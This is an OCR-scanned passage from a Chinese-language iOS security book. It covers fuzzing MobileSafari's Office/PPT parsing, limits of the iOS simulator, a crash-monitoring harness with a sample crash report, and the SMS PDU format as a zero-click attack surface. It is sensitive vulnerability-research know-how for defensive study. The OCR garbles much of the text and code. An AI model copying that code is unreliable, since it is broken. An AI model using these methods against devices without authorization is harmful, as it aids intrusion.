格式 ( .xls 、.ppt、.doc、.docx 等 ) 的 方式 。Safari 会 提示 用 户 下 载 文件 ， 而 MobileSafari 会 自动 解 
析 和 泻 染 文件 。 因 此 ， 我 们 没 办 法 通过 对 Safari 进 行 模糊 测试 来 对 MobileSafari 处 理 Office 文 件 的 
方法 进行 模糊 测试 。Microsoft Office 是 专门 处 理 这 些 文件 格式 的 ， 而 它 本 身 都 没 法 用 安全 的 方式 
来 处 理 这 些 文件 格式 , 所 以 我 们 也 不 必 期 望 并 非 专 门 处 理 这 些 格式 的 OS 能 处 理 得 更 好 。 事实 上 ， 
本 书 的 两 名 作者 就 利用 .ppt 格 式 赢 得 了 2011 年 的 Pwn2Own 大 赛 。 

如 果 为 MobileSafari 附 加 gdb ， 你 就 会 发 现 首 次 加 载 Office 文 档 时 会 加 载 名 为 OfficeImport 的 特 
殊 库 。 之 后 ， 在 进行 模糊 测试 时 ， 大 家 可 以 确认 该 库 是 处 理 Office 文 档 的 ， 因 为 大 家 会 在 其 中 发 
现 程序 崩溃 。 













































































165 OfficeImport F Ox38084000 dyldg YY 
/System/Library/PrivateFrameworks/OfficeImport.framework/ 
OfficeImport at 0x38084000 (offset 0x6c6000) 
/System/Library/PrivateFrameworks/OfficeImport.framework/ 
OfficeImport" at 0x38084000] 
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如 果 大 家 对 Mac OS X 非 常 了 解 ， 就 会 知道 一 种 预览 Office 文 档 的 方式 : 在 Finder 程 序 中 或 作 
为 Mail.app 中 的 附件 ， 选 中 文件 并 按 下 空格 键 。 这 种 预览 功能 就 得 益 于 快速 查看 。 而 我 们 可 以 利 
用 glmanage 程 序 通 过 命令 行 控制 快速 查看 。 例 如 : 

dlmanage -p good.ppt 
就 会 把 所 请 求 的 演示 文稿 呈现 在 屏幕 上 。 看 看 调试 器 中 的 qlmanage， 你 就 会 发 现 与 MobileSafari 
中 一 样 的 库 。 

173 OfficeImport F 0x1062b0000 dyld YY 


/System/Library/PrivateFrameworks/OfficeImport.framework/ 
Versions/A/OfficeImport at 0x1062pb0000 (offset 0x1062b0000) 


此 ， 要 对 MobileSafari 的 Office 文 档 模糊 测试 功能 进行 模糊 测试 ， 最 有 效 的 方法 就 是 对 
qlmanage 进 行 模糊 测试 。 记 住 , 某 些 实例 的 骨 溃 在 qlmanage 和 iOS (或 下 一 节 要 介绍 的 OS 模拟 髓 ) 
中 并 不 总 是 对 应 的 。 例如， 出 现在 qlmanage 中 的 崩 演 可 能 不 会 在 MobileSafari 中 出 现 。 不 过 , 这 似 
乎 是 相当 罕见 的 情形 , 而 且 更 可 能 是 库 版 本 的 些许 差异 引起 的 , 而 不 是 因为 它们 具有 不 同 的 代码 
或 功能 。 只 要 对 PDF 模 糊 吕 进行 细微 修改 , 我 们 就 可 以 制 成 应 该 能 在 iOS 中 查找 bug 的 PPT 模 糊 顺 。 
图 6-4 展 示 了 利用 该 工具 可 能 发 现 的 崩溃 。 




































































图 6-4 ”从 无 效 PPT 文 件 得 到 的 骨 溃 报告 


6.6 用 模拟 器 进行 模糊 测试 


iOS SDK 提 供 了 iOS 模 拟 需 。 该 模拟 器 让 开发 者 可 以 在 不 使 用 OS 设 备 的 情况 下 , 很 方便 地 运 
行 和 测试 用 iOS SDK 开 发 的 应 用 。 大 家 可 能 觉得 这 对 于 模糊 测试 而 言 是 很 理想 的 情况 ， 因 为 可 以 
在 并 行 运行 许多 进程 的 Mac OS X 系 统 中 对 iOS 进 行 模 糊 测 试 。 此 外 ， 有 了 虚拟 化 ， 大 家 可 以 在 各 
计算 机 上 运行 多 个 Mac OS X 系 统 实例 (因此 可 以 运行 多 个 模拟 器 实例 )。 不 过 ,如 图 6-5 所 示 的 模 
拟 需 对 于 模糊 测试 来 说 其 实 并 不 那么 理想 。 
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图 6-5” iOS 模拟 器 


大 家 可 以 在 /Developer/Platforms/iPhoneSimulator.platform/Developer/Applications/iPhone Simulator. 
app 处 找到 模拟 器 的 二 进 制 文件 。 

为 了 便于 讨论 ， 我 们 还 是 以 Safari ( MobileSafari ) 为 例 ， 因 为 在 本 章 之 前 的 内 容 中 我 们 就 是 
对 其 进行 模糊 测试 的 。 

通 览 iOS SDK， 你 就 会 发 现在 /Developer/Platforms/iPhoneSimulator.platform/Developer/SDKs/ 
iPhoneSimulator5.0.sdk 位 置 存在 与 精简 过 的 iOS 文 件 系 统 类 似 的 东西 。 对 于 本 节余 下 的 部 分 而 言 ， 
所 有 的 文件 都 是 与 这 一 目录 相关 的 ; 


$ ls -1 
Applications 
Developer 
Library 
SDKSettings.plist 
System 

usr 


看 看 Applications 文 件 夹 ,你 就 会 对 iOS 模 拟 需 对 于 模糊 测试 而 言 为 何不 理想 有 一 个 初步 的 认识 : 


$ ls -1 Applications/ 
AdSheet .app 
Camera.app 
Contacts~ipad.app 
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Contacts~iphone.app 
DataActivation.app 
Game Center~ipad.app 
Game Center~iphone.app 
MobileSafari .app 
MobileSlideShow.app 
Photo Booth.app 
Preferences.app 
TrustMe.app 

Web .app 

WebSheet .app 

iPodOut .app 
wakemonitor 


模拟 器 中 并 没有 多 少 应 用 。 例 如 ， 其 中 就 没有 iTunes 和 MobileMail 这 两 个 “ 板 上 钉 钉 的 ” 模 
糊 测 试 目 标 。 但 这 里 头 有 MobileSafari 这 个 最 佳 的 模糊 测试 目标 应 用 。 不 过 ， 要 是 仔细 看 看 这 个 
模拟 的 MobileSafari， 你 就 会 发 现 一 些 其 他 的 问题 

接 下 来 ， 我 们 详细 分 析 一 下 ios 模 拟 器 中 所 使 用 的 Mobilesafari， 大 家 可 以 在 Applications/ 
MobileSafari.app/MobileSafari 处 找到 它 。 





$ file MobileSafari.app/MobileSafari 
MobileSafari.app/MobileSafari: Mach-O executable i386 


该 程 ) 0 并 不 是 为 ARM 体 系 结构 设计 的 。 它 是 直接 与 模拟 需 在 同一 处 理 需 
运行 的 。 这 意味 着 该 版 本 的 MobileSafari 与 OS 中 实际 运行 的 版 本 有 着 相当 大 的 差异 。 来 看 看 
hese 你 会 发 现 它 运行 着 : 


$ ps aux | grep MobileSafari 

cmiller 78248 Qi0 Qa 852436 29344 ?2? S 9:17AM 
/Developer/Platforms/iPhoneSimulator.platform/Developer/SDKs/ 
iPhoneSimulator5.0.sdk//Applications/MobileSafari .app/MobileSafari 


事实 上 ， 大 家 可 以 看 到 所 有 正在 运行 的 与 模拟 器 相关 的 进程 ， 包 括 : 
口 AppIndexer; 

口 Searchd ; 

口 SpringBoard ; 

口 apsd; 

口 SimulatorBridge; 





























口 aggregated; 
口 BTServer; 
口 locationd ; 
口 mediaremoted ; 
口 ubd; 
口 MobileSafari。 
看 看 该 版 本 MobileSafari 二 进 制 文件 所 依赖 的 库 ， 你 就 会 发 现 它 与 实际 的 Safari 之 间 存 在 的 差 
异 。 这 些 库 包括 : 
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口 JavaScriptCore; 
口 WebKit; 
DQ UIRKit; 
口 SpringBoardServices; 
D CoreTelephony ; 
口 Twitter。 
这 里 列 出 的 库 有 些 也 能 在 Safari 中 找到 ， 而 有 些 则 不 能 〈 比方 说 上 述 列 表 中 的 后 4 个 库 )。 这 
些 库 是 从 iOS 文 件 系统 引用 的 ， 而 且 不 是 底层 主机 的 根 类 库 。 
所 以 , 很 显然 , i0S 模 拟 器 并 不 是 把 iOS 硬 件 设备 分 毫 不 差 地 搬 到 了 计算 机 上 。 它 与 实际 设备 
还 有 着 其 他 不 同 之 处 ， 比 如 没有 iOS 设 备 那 样 的 资源 限制 。 再 比如 ， 像 SVG 文件 这 类 模拟 器 没 法 
打开 的 文件 ， 在 实际 的 i9S 设 备 上 是 可 以 打开 的 。 起 码 ， 模 拟 咒 缺乏 硬件 设备 所 具有 的 内 存 保护 
机 制 ， 而 且 大 家 不 能 测试 像 SMS 这 样 与 硬件 紧密 相关 的 应 用 (在 本 章 后 面 的 内 容 中 你 将 会 了 解 )。 
使 用 模拟 器 最 大 的 不 方便 可 能 就 是 模拟 器 没 法 越狱 这 一 事实 。 也 就 是 说 , 在 模拟 器 中 我 们 没 
办 法 轻易 启动 应 用 ， 而 启动 应 用 是 进行 模糊 测试 的 基本 要 求 。 
如 果 想 克服 这 些 困 难 ， 对 模拟 器 进行 模糊 测试 ， 你 会 发 现 这 一 MobileSafari 的 骨 泪 报告 出 现 
在 Mac OS 义 主机 上 的 老 地 方 一 一 ~/Library/Logs/CrashReporter， 因 为 它 其 实 就 是 个 x86 应 用 。 
因此 , 大 家 可 以 试 着 对 模拟 器 应 用 进行 模糊 测试 , 不 过 它 与 实际 设备 间 的 差异 会 给 测试 工作 
造成 一 定 的 困难 ， 所 以 大 家 不 应 该 尽 信 得 出 的 结果 。 但 话 又 说 回来 ， 如果 可 以 对 实际 的 设备 进行 
模糊 测试 ， 又 干 嘛 要 去 对 模拟 需 进 行 模糊 测试 呢 ? 
























































6.7 ”对 MobileSafari 进行 模糊 测试 


我 们 大 致 可 以 按照 对 Mac OS X 计 算 机 上 的 Safari 进 行 模糊 测试 的 方式 对 MobileSafari 进 行 模 
糊 测试 。 主 要 的 区 别 就 在 于 崩 当 报告 文件 出 现 的 位 置 稍 有 不 同 、MobileSafari 中 没有 open 二 进 制 
文件 并 日 不 能 从 命令 行 启动 。 当 然 ， 由 于 硬件 的 限制 ， 模 糊 测 试 的 速度 也 要 慢 很 多 。 


6.7.1 选择 进行 模糊 测试 的 接口 


在 MobileSafari 中 我 们 可 以 找到 不 少 可 用 于 模糊 测试 的 东西 。 虽然 受 攻击 面 要 比 Mac OS X 小 ， 
但 是 其 大 小 仍然 相当 可 观 。 选 择 Microsoft Office 文 件 格式 就 是 个 不 错 的 主意 ， 因 为 在 iOS 中 它们 
会 被 自动 解析 ， 而 在 Mac OS X 中 就 不 能 。 也 许 这 说 明 苹 果 对 此 并 不 是 很 重视 。 本 节 要 展示 怎样 
利用 PowerPoint 的 .ppt 格 式 对 MobileSafari 进 行 模糊 测试 。 


6.7.2 生成 测试 用 例 


要 生成 测试 用 例 , 我 们 可 以 使 用 对 PDF 进 行 模糊 测试 时 用 过 的 fuzz_buffer 函 数 。 区别 之 一 
就 是 大 家 会 希望 在 桌面 计算 机 上 生成 测试 用 例 , 然后 将 它们 发 送 到 iOS 设 备 上 , 因为 OS 设备 的 计 
算 能 力 有 点 弱 。 因此 , 这 又 将 用 到 基于 变异 的 模糊 测试 。 稍 后 大 家 就 会 看 到 基于 生成 的 模糊 测试 。 
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6.7.3 MobileSafari 的 模糊 测试 与 监测 


在 iOS 中 ， 以 mopbile 用 户 权 限 运 行 的 进程 产生 的 崩 演 报告 最 终 都 出 现在 /private/var/ 
mobile/Library/Logs/CrashReporter 中 。 而 最 后 MobileSafari 的 月 演 则 是 从 LatestCrash-MobileSafari.plist 
文件 中 链接 的 。 

想得到 Mac OS X 上 open 二 进 制 文件 那样 的 工具 ， 你 就 要 用 到 让 MobileSafari 呈 现 网 页 的 辅助 
悍 序 。 大 家 可 以 从 https:/github.comy/comex/sbsutils/blob/mastersbopenurl.c 处 借用 sbopenurl。 











注意 感谢 @Gojohnnyboi 找 到 这 个 工具 。 


#include <CoreFoundation/CoreFoundation.h> 
#include <stdbool.h> 
#include <unistd.h> 


#define SBSApplicationLaunchUnlockDevice 4 
#define SBSApplicationDebugOnNextLaunch plus_SBSApplicationLaunch 
WaitForDebugger 0x402 


bool SBSOpenSensitiveURLAndUnlock (CFURLRef url, char flags); 


int main(int argc, char **argv) { 
if(largc != 2) { 
fprintf (stderr, "Usage: sbopenurl url\n"); 
} 
CFURLRef cu = CFURLCreateWithBytes (NULL, argv[1], 
strlen(argv[1]), kCFStringEncodingUTF8, NULL); 
if(!cu) { 
fprintf(stderr, "invalid URL\n"); 
return 1; 





} 
int fd = dup (2); 
close(2); 
bool ret = 
if(!ret) { 
Gup2 (fd, 2); 
fprintf (stderr, "SBSOpenSensitiveURLAndUnlock failed\n"); 
return 1; 


SBSOpenSensitiveURLAndUnlock (cu, 1); 


} 


return 0; 


} 
该 程序 会 直接 对 作为 命令 行 参数 传人 入 的 URL 调 用 SpringBoardService 专 有 框架 中 的 
SBSOpenSensitiveURLAndUnlock API。 大 家 可 以 用 如 下 命令 构建 该 程序 : 





/Developer/Platforms/iPhoneOS.platform/Developer/usr/bin/gcc -x 
objective-c -arch armv6 -isysroot 
/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOSs5.0 
.Sdk/ -F /Developer/Platforms/iPhoneOSs.platform/Developer/ 
SDKs/iPhoneO0Ss5.0.sdk/System/Library/PrivateFrameworks -9 一 
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-framework Foundation -framework SpringBoardServices -0o 
sbopenurl sbopenurl.c 


然后 ， 你 需要 为 其 提供 合适 的 授权 ， 让 它 运转 起 来 : 


codesign -fs "iPhone Developer" --entitlements ent.plist 
sbopenurl 


大 家 在 这 里 需要 用 到 之 前 从 苹果 公司 的 服务 右上 下 载 的 开发 者 证 书 。ent.plist 文 件 中 包含 了 
必要 的 授权 ， 如 下 所 示 : 


<dict> 
<key>com.apple.springboard.debugapplications</key> 
<true/> 
<key>com.apple.springboard.opensensitiveurl</key> 
<true/> 

</diet> 


我 们 将 该 程序 传输 到 iOS 设 备 上 ， 然 后 就 有 了 open 的 蔡 代 品 。 稍 有 修改 的 月 演 报 告 器 现在 已 
经 运行 在 iOS 上 了 : 


#!/bin/bash 

url=S$1 

sleeptime=$2 
filename=/private/var/mobile/Library/Logs/CrashReporter/ 
LatestCrash-MobileSafari .plist 

rm $filename 2> /dev/null 








echo Going to do $url 

/var/root/sbopenurl S$url 

sleep $sleeptime 

cat $filename 2>/dev/null 

/usr/bin/killall -9 MobileSafari 2>/dev/null 


而 且 与 之 前 有 着 相同 的 运行 方式 : 


iPhone:~ root# ./crash http://192.168.1.2/a/62.pdf 6 
Going to do http://192.168.1.2/a/62.pdf 


iPhone:~ root# ./crash http://192.168.1.2/a/63.pdf 6 
Going to do http://192.168.1.2/a/63.pdf 
<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" 
"http://www.apple.com/DTDs/PropertyList-1.0.dtd"> 
<plist version="1.0"> 
<dict> 
<key>AutoSubmitted</key> 
<true/> 
<key>SysInfoCrashReporterKey</key> 
<string>411e2ce88eec340ad40d98f220a2238d3696254c</string> 
<key>bug_type</key> 
<string>109</string> 








现在 你 已 经 分 别 掌握 了 生成 输入 、 针 对 URL 运 行 MobileSafari 以 及 检测 前 省 的 方法 ， 剩 下 的 
工作 就 是 要 将 它们 结合 起 来 。 我 们 在 这 里 把 整合 工作 留 给 感 兴趣 的 读者 自行 完成 。 
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6.8 PPT 模糊 测试 


在 运行 6.7 节 中 的 模糊 器 时 ， 大 家 很 快 就 会 找到 bug。 下 面 给 出 的 这 个 bug 示 例 是 在 编写 本 书 
时 尚未 修复 的 。 它 来 源 于 6.5 节 中 概述 过 的 同一 般 演 。 注意 , i0S 设 备 上 的 MobileSafari 般 演 中 是 无 
符号 可 用 的 (只 有 内 存 地 址 )。 


# ./crash http://192.168.1.2/bad.ppt 10 
Going to do http://192.168.1.2/bad.ppt 
<?xml] version="1.0" encoding="UTF-8"?> 
<!IDOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" 
"http://www.apple.com/DTDs/PropertyList-1.0.dtd"> 
<plist version="1.0"> 
<diot> 
<key>AutoSubmitted</key> 
<true/> 
<key>SysIinfoCrashReporterKey</key> 
<string>411le2ce88eec340ad40d98f220a2238d3696254c</string> 
<key>bug_type</key> 
<string>109</string> 
<key>description</key> 
<string>Incident Identifier: 7A75E653-019B-44AC-BE54-271959167450 
CrashReporter Key: 41le2ce88eec340ad40d98f220a2238d3696254c 

















Hardware Model: iPhone3,1 

Process: MobileSafari [1103] 

Path : /Applications/MobileSafari.app/MobileSafari 
Identifier: MobileSafari 

Version: 9 (FFF) 

Code Type: ARM (Native) 


Parent Process: launchd [1] 


Date/Time: 2011-12-18 21:56:57.053 -0600 
OS Version: iPhone OS 5.0.1 (9A405) 
Report Version: 104 


Exception Type: EXC_ BAD ACCESS (SIGSEGV) 
Exception Codes: KERN_INVALID ADDRESS at 0x0000002c 
Crashed Thread: 10 

















Thread 10 Crashed: 


0 OfficeImport 0x383594a0 0x3813e000 + 2208928 
1 OfficeImport Ox381bdc82 0x3813e000 + 523394 
2 OfficeImport 0x381lbcbbe 0x3813e000 + 519102 
3 OfficeImport 0x381bb990 0x3813e000 + 514448 
4 OfficeImport 0x38148010 0x3813e000 + 40976 

3 OfficeImport 0x38147b94 0x3813e000 + 39828 


Thread 10 crashed with ARM Thread State: 

r0: Ox00000024 1: 0x00000000 r2: 0x00000000 r3: 0x00000000 
r4: 0x00000000 r5: 0x0ecbece8 r6: 0x00000000 r7: 0x04fa8620 
r8: Ox002d3c90 r9: 0x00000003 r10:0x00000003 r11:0x0ecc43b0 
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ip: 0x04fa8620 
cpsr: 0x00000030 


如 果 同 步 自己 的 设备 ， 并 在 Xcode 的 Organizer 窗 口中 查看 日 志 ， 你 就 能 得 到 





sp: 0x04fa8620 


lr: 0x381bdc89 pe: 








符号 (具体 的 函 


数 名 称 和 行 号 等 信息 )， 如 图 6-6 所 示 。( 当然 ,大 家 也 可 以 使 用 单独 的 骨 省 报告 符号 化 实用 工具 ， 


iOS SDK 中 就 提供 了 这 样 的 工具 。) 














6.9 对 SMS 的 模糊 测试 


图 6-6 Xcode 中 符号 化 的 骨 溃 报告 


至 此 ,大 家 已 经 对 iOS 中 的 Web 浏 览 絮 进行 了 模糊 测试 。 这 是 目前 为 止 :OS 中 最 大 的 受 攻击 面 














之 一 。 不 过 ，iOS 显 然 不 是 只 有 个 移动 版 的 Web 浏 览 器 。 在 本 节 中 ， 大 家 要 对 多 数 桌面 计算 机 都 
没有 的 东西 进行 模糊 测试 。 这 里 要 说 明 如 何 对 iPhone 接 收 SMS ( Short Message Service， 短 消息 服 


务 ) 消息 的 方法 进行 模糊 测试 。 








SMS 是 文本 消息 所 使 用 的 技术 ， 它 是 将 少量 数据 通过 无 线 运营 商 的 无 线 电 网 络 发 送 到 设备 。 


出 于 若干 原因 ， 这 些 消息 
办 法 给 SMS 的 入 站 连接 设置 “防火 所 




















芝 7?》 


5 

















E 常 有 意思 的 。 虽然 找到 人 们 的 IP 地 址 可 能 很 难 ( 对 使 











带 来 了 很 多 的 攻击 方向 。 主 要 原因 在 于 ， 和 TCP/IP 栈 不 同 的 是 , 我 们 没 
所 有 的 SMS 通 信和 都 是 匿名 到 达 的 ， 而 ] 
的 处 理 。 从 选 定 目标 的 角度 来 看 ， 这 也 是 3 


肯定 会 得 到 设备 





用 地 点 不 断 变换 的 笔记 本 而 言 尤其 )， 但 和 弄 到 人 们 的 电话 号 码 往往 是 相当 容易 的 。SMS 这 个 攻击 
方向 之 所 以 很 吸引 人 还 有 一 个 原因 : 它 不 需要 任何 用 户 交互 就 能 让 数据 进入 应 用 。 这 与 攻击 Web 
































浏览 右 是 不 同 的 ,攻击 浏 
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需 需 要 让 用 户 访问 恶意 网 站 才 行 。 除 此 之 外 ,对 于 攻击 者 来 说 还 有 个 
利好 消息 ， 那 就 是 i0S 中 处 理 SMS 消 息 的 进程 并 未 运行 在 沙 盒 中 ， 而 且 负 责 与 基 囊 处 理 吉 之 间 的 














通信 ( 稍 后 会 详细 介绍 )。 所 以 ， 有 了 电话 号 码 和 SMS 漏 洞 攻击 ， 攻 击 者 就 可 以 在 不 进行 用 户 交 
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互 的 情况 下 让 监控 手机 通话 和 文本 短信 的 代码 运行 起 来 ， 而 且 只 要 是 受害 者 想 接 电 话 或 收 短信 ， 
就 没什么 好 办 法 抵御 这 种 攻击 。SMS 漏 洞 攻击 的 确 是 非常 强大 的 。 接 下 来 我 们 就 要 看 看 如 何在 iOS 
中 寻找 SMS 漏 洞 。 























6.9.1 SMS 基 础 知识 


SMS 其 实 是 用 于 GSM 移 动 通信 系统 中 的 通信 协议 ,该 协议 最 初 记载 于 20 多 年 前 的 GSM 标 准 
中 。SMS 利 用 了 处 于 闲置 状态 的 为 手机 话 务 控制 保留 的 带宽 。 该 控制 信道 用 于 手机 与 附近 基站 间 
的 通信 ， 并 为 基站 和 手机 提供 了 得 知 网 络 正常 的 途径 。 建 立 通话 也 需要 用 到 该 信道 ， 比 如 基站 在 
手机 有 来 电 时 就 会 通过 该 信道 向 手机 发 送 消息 。SMS 也 是 使 用 这 些 控制 信道 的 , 所 以 实现 这 一 功 
能 并 不 会 给 运营 商 增加 任何 硬件 成 本 。 缺 点 就 如 同 “ 短 信 ” 这 个 名 称 所 显示 的 , 每 条 消息 都 很 短 。 
目前 的 SMS 数 据 被 限制 为 140 字 节 ， 或 者 是 160 个 7 位 字符 〈70 个 16 位 字符 )。 现 在 ， 包 括 3G 和 4G 
网 络 在 内 的 多 种 网 络 都 允许 使 用 SMS 。 

当 设 备 发 送 SMS 消 息 时 ， 其 实 是 把 它 发 送 到 SMSC ( Short Message Service Center， 短 消息 服 
务 中 心 ), 然后 由 SMSC 向 本 来 的 收 信人 转发 该 消息 。 这 可 能 是 将 消息 传送 给 另 一 个 SMSC， 也 可 
能 是 直接 传送 给 收 信 人 人， 取决 于 发 送 设 备 和 接收 设备 是 否 处 于 相同 的 运营 商 网 络 中 。SMSC 在 这 
里 扮演 的 角色 就 类 似 于 了 P 网 络 中 的 路 由 器 ， 只 不 过 有 一 个 很 大 的 区 别 。 如 果 收 信人 是 不 可 达 的 ， 
比方 说 ， 如 果 他 们 的 手机 关机 了 或 者 是 不 在 服务 区 ，SMSC 就 会 把 消息 转 入 待 发 队列 ， 以 便 在 收 
信人 的 设备 接 入 网 络 后 继续 发 送 该 消息 。SMS 发 送 是 种 尽 最 大 努力 的 服务 , 也 就 是 说 ,不 保证 每 
条 发 送出 的 消息 都 能 达到 目的 地 ， 也 不 能 保证 一 定 不 会 有 延迟 。 

SMS 不 仅 能 发 送 文本 ， 有 些 提供 商 也 允许 对 使 用 SMS 消 息 的 设备 进行 空中 编程 (over-the-air 
programming )。 用 户 可 以 发 送 铃 声 和 图 片 这 样 的 二 进 制 数据 , 或 是 使 用 SMS 作 为 收 到 语音 邮件 时 
的 提醒 。 特别 要 说 明 的 是 , iOS 可 以 利用 SMS 消 息 提供 涉及 可 视 语 音 邮件 和 彩信 (MMS ) 的 信息 。 

iPhone 其 实 有 两 个 处 理 絮 ,一 个 是 主 CPU, 叫 作 应 用 处 理 器 , 一 个 副 CPU,， 叫 作 基带 处 理 器 。 
主 CPU 用 于 运行 OS 操作 系统 内 核 ， 以 及 目前 提 到 过 的 所 有 应 用 。 基 带 处 理 器 则 运行 着 特制 的 实 
时 操作 系统 ， 用 于 控制 移动 电话 接口 ， 并 要 人 处理 设 备 与 蜂 窒 电话 网 络 之 间 的 所 有 通信 。( 第 11 章 
会 详细 介绍 基带 处 理 器 。) 现在 ， 大 家 只 需要 知道 基带 处 理 需 提供 了 一 种 与 应 用 处 理 器 进行 通信 
的 方式 。 这 种 通信 是 在 若干 逻辑 串 行 线路 上 进行 的 。 在 早期 的 让 pone 上 ， 在 应 用 CPU 上 运行 的 软 
件 是 利用 基于 文本 的 GSM AT 命令 集 ， 通 过 这 些 串 行 线路 与 调制 解 调 器 进行 通信 的 。 这 些 AT 命 令 
用 于 控制 蜂窝 电话 网 络 接口 的 各 个 方面 ， 包 括 通话 控制 和 SMS 传 送 。 

当 SMSC 将 SMS 消 息 传送 到 iPhone 的 调制 解 调 嚣 时， 调制 解 调 器 会 通过 不 请 自 来 的 AT 命 令 结 
果 码 与 应 用 处 理 器 进行 通信 。 结 果 码 是 由 两 行文 本 组 成 的 。 第 一 行 含有 结果 码 和 接 下 来 那 行 的 字 
节 数 。 第 二 行 的 内 容 则 是 十 六 进 制 形式 表示 的 SMS 消 息 。 这 些 AT 命令 结 果 码 是 由 iPhone 上 某 些 版 
本 的 CommCenter 进 程 读 取 的 。 

由 哪个 进程 处 理 这 种 通信 取决 于 iPhone 的 硬件 。/SystemyLibrary/LaunchDaemons 目 录 中 有 两 
个 相关 联 的 plist 文 件 , 分 别 是 com.apple.CommCenter.plist 和 com.apple.CommCenterClassic.plist。 查 
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看 这 两 个 文件 ( 在 用 plutil 将 其 转换 成 XML 格式 后 ), 你 就 会 发 现 它 们 都 具有 com.apple.CommCenter 
标记 ， 不 过 ， 它 们 被 限制 到 不 同 硬件 。CommCenterClassic 列 出 了 : 





<key>LimitLoadToHardware</key> 
二 GEEs 
<key>machine</key> 
<array> 
<string>iPhonel,2</string> 
<string>iPhone2,1</string> 
<string>iPhone3,1</string> 
<string>iPod2,1</string> 
<string>iPod2,2</string> 
<string>iPod3,1</string> 
<string>iPod4,1</string> 
<string>iPad0,1</string> 
<string>iPadl1,1</string> 
<string>iPad2,1</string> 
<string>iPad2,2</string> 
<string>AppleTV2,1</string> 
</array> 
</dicets 





相 较 而 言 ，CommCenter 列 出 了 一 组 不 同 的 硬件 : 


<key>LimitLoadToHardware</key> 
<dict> 
<key>machine</key> 
<array> 
<string>iPhone3,3</string> 
<string>iPhone4,1</string> 
<string>iPhone4,2</string> 
<string>iPad2,3</string> 
<string>iPad3,1</string> 
<string>iPad3,2</string> 
<string>iPad3,3</string> 
</array> 
</dict> 


简单 起 见 ， 本 章 只 研究 CommCenterClassic。 


6.9.2 ”聚焦 协议 数据 单元 模式 


SMS 规 范 规 定 了 调制 解 调 需 的 两 种 运行 模式 ， 分 别 是 SMS 文 本 模式 和 SMS PDU ( Protocol 
Data Unit， 协 议 数据 单元 ) 模式 。 在 处 于 不 同 模式 时 ，SMS AT 命令 的 文法 以 及 返回 的 响应 都 是 
不 同 的 。 最 大 的 区 别 就 是 SMS 文 本 模式 只 支持 文本 。 例 如 ， 想 发 送 SMS 消 息 ， 你 就 要 使 用 : 


AT+CMGS="+85291234567" 
Lame SMS text mode message 
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为 这 一 限制 ，SMS 文 本 模式 下 可 用 的 功能 就 要 少 得 多 。SMS 文 本 模式 还 有 一 个 问题 ， 即 它 
没有 得 到 调制 解 调 器 的 广泛 支持 。 

出 于 这 些 原 因 ， 本 节 要 将 注意 力 放 在 SMS PDU 模 式 上 。 这 为 大 家 提供 了 一 个 更 大 的 (虽然 
与 浏览 器 相 比 是 相当 小 的 ) 受 攻击 面 来 查找 bug。 

SMS 消息 有 两 种 格式 。SMS-SUBMIT 格 式 用 于 把 消息 从 移动 设备 发 送 到 SMSC ， 而 
SMS-DELIVER 格 式 用 于 把 消息 从 SMSC 发 送 到 移动 设备 。 因 为 本 节 的 重点 是 iOS 如 何 处 理 收 到 的 
言 息 ， 所 以 这 里 主要 讲解 SMS-DELIVER 消 息 。 

下 面 的 内 容 是 一 段 对 应 SMS PDU 模 式 下 SMS-DELIVER 格 式 的 AT 结 果 码 : 


ECMT ;30 
0791947106004034040D91947196466656F80000901082114215400BE8329BFD4697D9EC377D 


CMT 结 果 码 用 于 iOS 中 SMS 消 息 的 传送 。 现 在 大 家 已 经 了 解 到 SMS-DELIVER 格 式 的 消息 是 
什么 样 了 ， 在 剖析 这 个 示例 的 过 程 中 ， 我 们 会 详细 描述 这 一 格式 。 

第 一 个 字 节 表示 SMSC 信 息 的 长 度 ， 在 本 例 中 这 个 长 度 是 7 个 八 位 组 〈 字 节 )。 这 7 个 八 位 组 
( 91947106004034 ) 还 要 进一步 分 割 。 其 中 , 第 一 个 字 节 是 SMSC 的 地 址 类 型 ,这 里 就 是 91, 表 
示 这 是 个 国际 电话 号 码 。 剩 下 的 数字 则 构成 了 实际 的 SMSC 号 码 ，+491760000443。 注 意 ,这 里 
各 个 字 节 都 是 反 转 的 。 接 下 来 的 八 位 组 ( 04 ) 是 消息 头 标志 。 该 八 位 组 中 最 不 重要 的 两 位 就 是 表 
示 这 是 一 条 SMS-DELIVER 消 息 的 0。 设 置 该 位 就 表示 还 有 更 多 的 消息 要 发 送 。 本 例 中 并 未 设置 
的 UDHI 位 也 很 重要 ， 我 们 将 在 6.9.4 节 中 详细 介绍 。 

接 下 来 就 是 发 送 人 的 地 址 。 就 像 SMSC 的 地 址 那样 ， 这 些 八 位 组 也 是 由 长 度 、 类 型 和 数据 组 
成 的 ， 如 下 所 示 : 

0D 91 947196466656F8 

不 同 的 是 ， 这 里 的 长 度 是 用 半 八 位 组 ( semi-octet ) 的 数量 减 去 3 计算 出 来 的 。 如 果 数 据 是 十 
六 进 制 的 ( 0x94、0x71、0x96，……: ), 或 是 ASCIH 形 式 的 “字符 ”( 491769……… )， 半 八 位 组 就 
可 视 作 四 位 字 节 (nibble )。 

接 下 来 的 字 节 是 协议 标识 符 (TP-PID )。 根据 这 几 位 设置 的 不 同 , 该 字 节 有 着 诸多 不 同 含义 。 
通常 情况 下 , 它 会 被 设置 成 00, 表示 协议 可 以 根据 地 址 确定 。 随 后 的 字 节 表示 的 是 数据 编码 模式 
(TP-DCS )。 该 字段 指出 了 SMS 消 息 的 数据 是 如 何 编码 的 。 这 包括 数据 是 否 使 用 7 位 、8 位 或 16 位 
字母 表 压 缩 过 ， 以 及 数据 是 否 用 作 某 些 类 型 ( 比如 语音 邮件 ) 的 指示 符 。 在 本 例 中 ,这 个 字段 是 
00 ， 表 示 数 据 是 未 经 压缩 的 7 位 警告 ， 并 且 应 该 能 立即 显示 出 来 。 

再 下 来 的 7 字 节 是 消息 的 时 间 戳 (TP-SCTS )。 第 一 个 字 节 是 年 份 ， 接 着 是 月 份 ， 等 等 。 每 个 
字 节 都 是 交换 过 的 四 位 字 节 。 在 本 例 中 ， 消 息 是 在 2009 年 1 月 28 日 的 某 个 时 刻 发 送 的 。 

接 下 来 的 字 节 是 用 户 数据 长 度 (TP-UDL )。 因 为 TP-DCS 字 段 表示 7 位 数据 , 所 以 这 就 是 后 面 
